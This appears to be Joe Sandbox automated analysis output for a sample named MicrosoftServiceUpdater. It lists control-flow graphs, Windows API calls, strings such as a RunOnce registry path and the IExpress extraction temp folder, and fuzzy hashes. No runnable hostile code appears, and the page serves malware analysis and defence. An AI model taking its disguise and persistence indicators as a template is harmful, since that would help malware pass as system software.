                                                                                                                                                                                          control_flow_graph 242 7ff6363468f0-7ff636346950 call 7ff6363451f8 LocalAlloc 245 7ff636346982-7ff636346996 call 7ff6363451f8 242->245 246 7ff636346952-7ff636346975 call 7ff636344f2c call 7ff636347958 242->246 252 7ff636346998-7ff6363469cf call 7ff636344f2c LocalFree 245->252 253 7ff6363469d1-7ff636346a16 lstrcmpA LocalFree 245->253 260 7ff63634697b-7ff63634697d 246->260 252->260 254 7ff636346a18-7ff636346a1a 253->254 255 7ff636346a63-7ff636346a69 253->255 258 7ff636346a27 254->258 259 7ff636346a1c-7ff636346a25 254->259 261 7ff636346d40-7ff636346d64 call 7ff636347d28 255->261 262 7ff636346a6f-7ff636346a75 255->262 264 7ff636346a2a-7ff636346a3a call 7ff636346710 258->264 259->258 259->264 265 7ff636346d66-7ff636346d92 call 7ff6363486f0 260->265 261->265 262->261 267 7ff636346a7b-7ff636346a9c GetTempPathA 262->267 277 7ff636346d3b-7ff636346d3e 264->277 278 7ff636346a40-7ff636346a5e call 7ff636344f2c 264->278 271 7ff636346ad9-7ff636346ae5 267->271 272 7ff636346a9e-7ff636346aaa call 7ff636346710 267->272 274 7ff636346ae8-7ff636346aeb 271->274 280 7ff636346aaf-7ff636346ab1 272->280 279 7ff636346af0-7ff636346afa 274->279 277->265 278->260 283 7ff636346b0d-7ff636346b1f 279->283 284 7ff636346afc-7ff636346b01 279->284 280->277 281 7ff636346ab7-7ff636346ac1 call 7ff636342490 280->281 281->271 294 7ff636346ac3-7ff636346ad3 call 7ff636346710 281->294 288 7ff636346d07-7ff636346d30 GetWindowsDirectoryA call 7ff636346f14 283->288 289 7ff636346b25-7ff636346b3b GetDriveTypeA 283->289 284->283 287 7ff636346b03-7ff636346b0b 284->287 287->279 287->283 288->260 301 7ff636346d36 288->301 292 7ff636346b3d-7ff636346b40 289->292 293 7ff636346b42-7ff636346b56 GetFileAttributesA 289->293 292->293 296 7ff636346b5c-7ff636346b5f 292->296 293->296 297 7ff636346be9-7ff636346bfc call 7ff636346f14 293->297 294->271 294->277 298 7ff636346bd9 296->298 299 7ff636346b61-7ff636346b6b 296->299 309 7ff636346c20-7ff636346c2c call 7ff636342490 297->309 310 7ff636346bfe-7ff636346c0a call 7ff636342490 297->310 303 7ff636346bdd-7ff636346be4 298->303 299->303 304 7ff636346b6d-7ff636346b7f 299->304 301->274 308 7ff636346cfe-7ff636346d01 303->308 304->303 307 7ff636346b81-7ff636346bad GetDiskFreeSpaceA 304->307 307->298 312 7ff636346baf-7ff636346bd0 MulDiv 307->312 308->288 308->289 317 7ff636346c2e-7ff636346c3d GetWindowsDirectoryA 309->317 318 7ff636346c42-7ff636346c6a call 7ff636347e08 GetFileAttributesA 309->318 310->298 319 7ff636346c0c-7ff636346c1e call 7ff636346f14 310->319 312->298 315 7ff636346bd2-7ff636346bd7 312->315 315->297 315->298 317->318 324 7ff636346c6c-7ff636346c7f CreateDirectoryA 318->324 325 7ff636346c81 318->325 319->298 319->309 326 7ff636346c84-7ff636346c86 324->326 325->326 327 7ff636346c99-7ff636346cba SetFileAttributesA 326->327 328 7ff636346c88-7ff636346c97 326->328 329 7ff636346cbd-7ff636346cc7 327->329 328->308 330 7ff636346cc9-7ff636346ccf 329->330 331 7ff636346cdb-7ff636346cf8 call 7ff636346710 329->331 330->331 333 7ff636346cd1-7ff636346cd9 330->333 331->277 335 7ff636346cfa 331->335 333->329 333->331 335->308
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                          • API String ID: 3973824516-1225630530
                                                                                                                                                                                          • Opcode ID: 28cd37821b83d7ac2435a0433a1392ae73f1c371a6b1185d5ace62dce145bb5d
                                                                                                                                                                                          • Instruction ID: c2ec30e328f75776b4791e7390bf72086dd71e15d24ce18315dfd8cf0b6f6d8b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 28cd37821b83d7ac2435a0433a1392ae73f1c371a6b1185d5ace62dce145bb5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3D18222A1C68286FB128F21D450ABAF7A1FF86744F546035DA4E83795DFBFD815EB00

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 336 7ff636342edc-7ff636342f75 call 7ff636348da9 memset * 2 call 7ff6363451f8 341 7ff6363431cd 336->341 342 7ff636342f7b-7ff636342fbc CreateEventA SetEvent call 7ff6363451f8 336->342 344 7ff6363431d2-7ff6363431e1 call 7ff636344f2c 341->344 347 7ff636342feb-7ff636342ff3 342->347 348 7ff636342fbe-7ff636342fc8 342->348 349 7ff6363431e6 344->349 352 7ff636342ffd-7ff636343018 call 7ff6363451f8 347->352 353 7ff636342ff5-7ff636342ff7 347->353 350 7ff636342fca-7ff636342fe6 call 7ff636344f2c 348->350 351 7ff6363431e8-7ff63634320b call 7ff6363486f0 349->351 350->349 362 7ff636343026-7ff636343044 CreateMutexA 352->362 363 7ff63634301a-7ff636343024 352->363 353->352 356 7ff6363430cb-7ff6363430db call 7ff636347320 353->356 366 7ff6363430dd-7ff6363430e7 356->366 367 7ff6363430ec-7ff6363430f3 356->367 362->356 365 7ff63634304a-7ff63634305b GetLastError 362->365 363->350 365->356 370 7ff63634305d-7ff636343070 365->370 366->344 368 7ff636343106-7ff636343125 FindResourceExA 367->368 369 7ff6363430f5-7ff636343101 call 7ff636342034 367->369 372 7ff636343127-7ff636343139 LoadResource 368->372 373 7ff63634313c-7ff636343143 368->373 369->349 374 7ff63634308a-7ff6363430a7 call 7ff636344f2c 370->374 375 7ff636343072-7ff636343088 call 7ff636344f2c 370->375 372->373 378 7ff636343151-7ff636343158 373->378 379 7ff636343145-7ff63634314c #17 373->379 374->356 385 7ff6363430a9-7ff6363430c6 CloseHandle 374->385 375->385 382 7ff63634315a-7ff63634315d 378->382 383 7ff636343162-7ff63634316c call 7ff636343d34 378->383 379->378 382->351 383->349 388 7ff63634316e-7ff63634317d 383->388 385->349 388->382 389 7ff63634317f-7ff636343189 388->389 389->382 390 7ff63634318b-7ff636343192 389->390 390->382 391 7ff636343194-7ff63634319b call 7ff636341258 390->391 391->382 394 7ff63634319d-7ff6363431c9 call 7ff636347d28 391->394 394->349 397 7ff6363431cb 394->397 397->382
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                                                                                          • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$one
                                                                                                                                                                                          • API String ID: 3100096412-2285045364
                                                                                                                                                                                          • Opcode ID: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                                                                                                                          • Instruction ID: b2fde54bb1eec815097fc0f712eabe02532a00573b670032c46ccbc0a32c843b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E817C31A0C64286F7629B16A841BB9E6A0FF86744F807135D90EC37A1CFBFE545EB01

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 398 7ff636346f14-7ff636346f59 399 7ff636346f5b-7ff636346f5e 398->399 400 7ff636346f63-7ff636346f8c GetCurrentDirectoryA SetCurrentDirectoryA 398->400 401 7ff636347262-7ff636347291 call 7ff6363486f0 399->401 402 7ff636346fbb-7ff636346ff6 GetDiskFreeSpaceA 400->402 403 7ff636346f8e-7ff636346fb6 call 7ff636344f2c call 7ff636347958 400->403 404 7ff636346ffc-7ff636347024 MulDiv 402->404 405 7ff6363471da-7ff63634722f memset call 7ff636347958 GetLastError FormatMessageA 402->405 420 7ff636347260 403->420 404->405 409 7ff63634702a-7ff636347060 GetVolumeInformationA 404->409 416 7ff636347234-7ff63634725b call 7ff636344f2c SetCurrentDirectoryA 405->416 413 7ff6363470c1-7ff6363470e5 SetCurrentDirectoryA 409->413 414 7ff636347062-7ff6363470bc memset call 7ff636347958 GetLastError FormatMessageA 409->414 418 7ff6363470e9-7ff6363470f0 413->418 414->416 416->420 423 7ff636347103-7ff636347116 418->423 424 7ff6363470f2-7ff6363470f7 418->424 420->401 427 7ff63634711a-7ff63634711d 423->427 424->423 426 7ff6363470f9-7ff636347101 424->426 426->418 426->423 428 7ff636347150-7ff636347157 427->428 429 7ff63634711f-7ff636347128 427->429 430 7ff636347159-7ff636347161 428->430 431 7ff636347186-7ff636347197 428->431 429->427 432 7ff63634712a 429->432 430->431 433 7ff636347163-7ff636347184 430->433 434 7ff63634719a-7ff6363471a2 431->434 432->428 435 7ff63634712c-7ff63634714b call 7ff636344f2c 432->435 433->434 436 7ff6363471be-7ff6363471c1 434->436 437 7ff6363471a4-7ff6363471a8 434->437 435->420 441 7ff6363471c7-7ff6363471ca 436->441 442 7ff6363471c3-7ff6363471c5 436->442 440 7ff6363471aa 437->440 443 7ff6363471cc-7ff6363471d5 440->443 444 7ff6363471ac-7ff6363471b9 call 7ff636342520 440->444 441->440 442->440 443->401 444->401
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                          • API String ID: 1611563598-884561453
                                                                                                                                                                                          • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                                                                                                                          • Instruction ID: b132f10faa000a9154eced0011992aae1c24f29c241f4749cb645592da02434d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24A17036A187428AF7218F21E454ABAFBA0FB89744F446135EA4D83B94DFBFD445DB00

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                          • String ID: *MEMCAB$CABINET
                                                                                                                                                                                          • API String ID: 1305606123-2642027498
                                                                                                                                                                                          • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                                                                                                                          • Instruction ID: ded9ac9e7b956c0e36cb6c209ba5898732ea754c23e37df06e6e76478c916f27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                                                                                                                          • Instruction Fuzzy Hash: E351F931A08B4286FB528B10E854BB5BBA0FF8A755F856135C94E827A5DFBFE004E700

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 501 7ff636343214-7ff63634323c 502 7ff636343269-7ff636343270 call 7ff6363461d4 501->502 503 7ff63634323e-7ff636343244 501->503 511 7ff636343368 502->511 512 7ff636343276-7ff63634327d call 7ff6363468f0 502->512 505 7ff636343246 call 7ff636346294 503->505 506 7ff63634325c-7ff636343263 call 7ff636344064 503->506 513 7ff63634324b-7ff63634324d 505->513 506->502 506->511 515 7ff63634336a-7ff63634338a call 7ff6363486f0 511->515 512->511 519 7ff636343283-7ff6363432c5 GetSystemDirectoryA call 7ff636347e08 LoadLibraryA 512->519 513->511 516 7ff636343253-7ff63634325a 513->516 516->502 516->506 523 7ff6363432c7-7ff6363432e0 GetProcAddress 519->523 524 7ff6363432fb-7ff636343310 FreeLibrary 519->524 523->524 525 7ff6363432e2-7ff6363432f5 DecryptFileA 523->525 526 7ff636343316-7ff63634331c 524->526 527 7ff6363433a5-7ff6363433ba SetCurrentDirectoryA 524->527 525->524 526->527 530 7ff636343322-7ff63634333d GetWindowsDirectoryA 526->530 528 7ff6363433bc-7ff6363433c1 527->528 529 7ff6363433c3-7ff6363433c9 527->529 535 7ff636343344-7ff636343362 call 7ff636344f2c call 7ff636347958 528->535 531 7ff63634345f-7ff636343467 529->531 532 7ff6363433cf-7ff6363433d6 529->532 533 7ff63634338c-7ff63634339c call 7ff636346f14 530->533 534 7ff63634333f 530->534 536 7ff636343469-7ff63634346b 531->536 537 7ff63634347b 531->537 538 7ff6363433db-7ff6363433e9 532->538 545 7ff6363433a1-7ff6363433a3 533->545 534->535 535->511 536->537 541 7ff63634346d-7ff636343474 call 7ff6363423c0 536->541 544 7ff63634347d-7ff63634348b 537->544 538->538 542 7ff6363433eb-7ff6363433f2 538->542 552 7ff636343479 541->552 547 7ff63634342d call 7ff636345f80 542->547 548 7ff6363433f4-7ff6363433fb 542->548 550 7ff6363434a8-7ff6363434af 544->550 551 7ff63634348d-7ff636343493 544->551 545->511 545->527 560 7ff636343432 547->560 548->547 553 7ff6363433fd-7ff63634342b call 7ff636347d28 548->553 557 7ff6363434ba-7ff6363434bf 550->557 558 7ff6363434b1-7ff6363434b3 550->558 551->550 556 7ff636343495 call 7ff6363441b4 551->556 552->544 564 7ff636343434 553->564 565 7ff63634349a-7ff63634349c 556->565 557->515 558->557 562 7ff6363434b5 call 7ff636344a54 558->562 560->564 562->557 567 7ff636343436-7ff636343440 564->567 568 7ff636343445-7ff636343453 call 7ff636347984 564->568 565->511 569 7ff6363434a2 565->569 567->511 568->511 572 7ff636343459 568->572 569->550 572->531
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                          • API String ID: 3010855178-1843939461
                                                                                                                                                                                          • Opcode ID: 2e6000fa735939a8760838acb90b318ee81f0ab0eeaf0813bf836ba92e9e2adc
                                                                                                                                                                                          • Instruction ID: f057ddbd8b1f9aa5e612638c2ce5f2013803641dae75dd24f976e002521d6029
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6000fa735939a8760838acb90b318ee81f0ab0eeaf0813bf836ba92e9e2adc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52710A21E4C64286FA639B16A841BB9F6A0EF95784F817035D94DC33A1DFFFE444E601

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                                                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                                                                                          • API String ID: 1302179841-1204263913
                                                                                                                                                                                          • Opcode ID: 4ba687424917c1ccd78bb128096c365ebfcc9905b2b178c7727c0b3013c9a0da
                                                                                                                                                                                          • Instruction ID: 8b9a6de8f457b2a28ff9e6308ed1ead53e88b967cef329473529076c5daacc7d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ba687424917c1ccd78bb128096c365ebfcc9905b2b178c7727c0b3013c9a0da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33415C31E0C64286FB669B61A881AB5F7A0EF49B80F457035DA0DD2395DFFFE480E604

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 836429354-0
                                                                                                                                                                                          • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                                                                                          • Instruction ID: 967480590739110aed898704d1d1bffa610628db9c7e605aa64523ea59b82c3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9518E7261CA8696FB128F20D8046F9BBA0FB49B84F849171DA1D83785DF7FD509D300

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                          • API String ID: 3049360512-1194799165
                                                                                                                                                                                          • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                                                                                          • Instruction ID: c4521ecf05344209232eb48b68277139356551b6a4f446c4ca406ea17c7b7461
                                                                                                                                                                                          • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68511C61A08A8286FB528F14E854BB9F7A0FF46B45F846131CA4D837A5CFBFE458D700

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 573 7ff636346710-7ff63634673c 574 7ff63634680b-7ff63634681a 573->574 575 7ff636346742-7ff636346747 call 7ff6363465a8 573->575 576 7ff63634681d-7ff636346827 574->576 580 7ff63634674c-7ff63634674e 575->580 578 7ff636346829-7ff63634682f 576->578 579 7ff63634683c-7ff636346847 576->579 578->579 581 7ff636346831-7ff63634683a 578->581 582 7ff63634684a-7ff636346854 call 7ff636346d9c 579->582 583 7ff6363468c0 580->583 584 7ff636346754-7ff63634676a 580->584 581->576 581->579 596 7ff636346856-7ff636346869 CreateDirectoryA 582->596 597 7ff636346875-7ff63634687d call 7ff636346f14 582->597 586 7ff6363468c2-7ff6363468e6 call 7ff6363486f0 583->586 585 7ff63634676d-7ff636346777 584->585 588 7ff636346779-7ff63634677f 585->588 589 7ff63634678c-7ff6363467a1 585->589 588->589 592 7ff636346781-7ff63634678a 588->592 593 7ff6363467f8-7ff636346809 call 7ff636347e08 589->593 594 7ff6363467a3-7ff6363467bb GetSystemInfo 589->594 592->585 592->589 593->582 598 7ff6363467e7 594->598 599 7ff6363467bd-7ff6363467c0 594->599 600 7ff63634686b 596->600 601 7ff636346894-7ff63634689f call 7ff636347958 596->601 609 7ff636346882-7ff636346884 597->609 608 7ff6363467ee-7ff6363467f3 call 7ff636347e08 598->608 606 7ff6363467de-7ff6363467e5 599->606 607 7ff6363467c2-7ff6363467c5 599->607 600->597 601->583 606->608 611 7ff6363467c7-7ff6363467ca 607->611 612 7ff6363467d5-7ff6363467dc 607->612 608->593 614 7ff636346886-7ff636346892 609->614 615 7ff6363468a1-7ff6363468a8 609->615 611->593 617 7ff6363467cc-7ff6363467d3 611->617 612->608 614->586 615->583 616 7ff6363468aa-7ff6363468bb RemoveDirectoryA 615->616 616->583 617->608
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF636342E07), ref: 00007FF63634685B
                                                                                                                                                                                            • Part of subcall function 00007FF6363465A8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF636342E07), ref: 00007FF636346643
                                                                                                                                                                                            • Part of subcall function 00007FF6363465A8: GetFileAttributesA.KERNELBASE ref: 00007FF636346652
                                                                                                                                                                                            • Part of subcall function 00007FF6363465A8: GetTempFileNameA.KERNEL32 ref: 00007FF63634667F
                                                                                                                                                                                            • Part of subcall function 00007FF6363465A8: DeleteFileA.KERNEL32 ref: 00007FF636346697
                                                                                                                                                                                            • Part of subcall function 00007FF6363465A8: CreateDirectoryA.KERNEL32 ref: 00007FF6363466A8
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF636342E07), ref: 00007FF6363467A8
                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF636342E07), ref: 00007FF6363468B4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                          • API String ID: 1979080616-3204624237
                                                                                                                                                                                          • Opcode ID: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                                                                                          • Instruction ID: f7e928200c2d8fe6324005ef67f7cd22ccee6684bd06cb88f443922941dc2ee5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9517D61B4C68285FB528F15A814BB9E7A0AF87780F986035C94DC3791CFBFE819E700

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
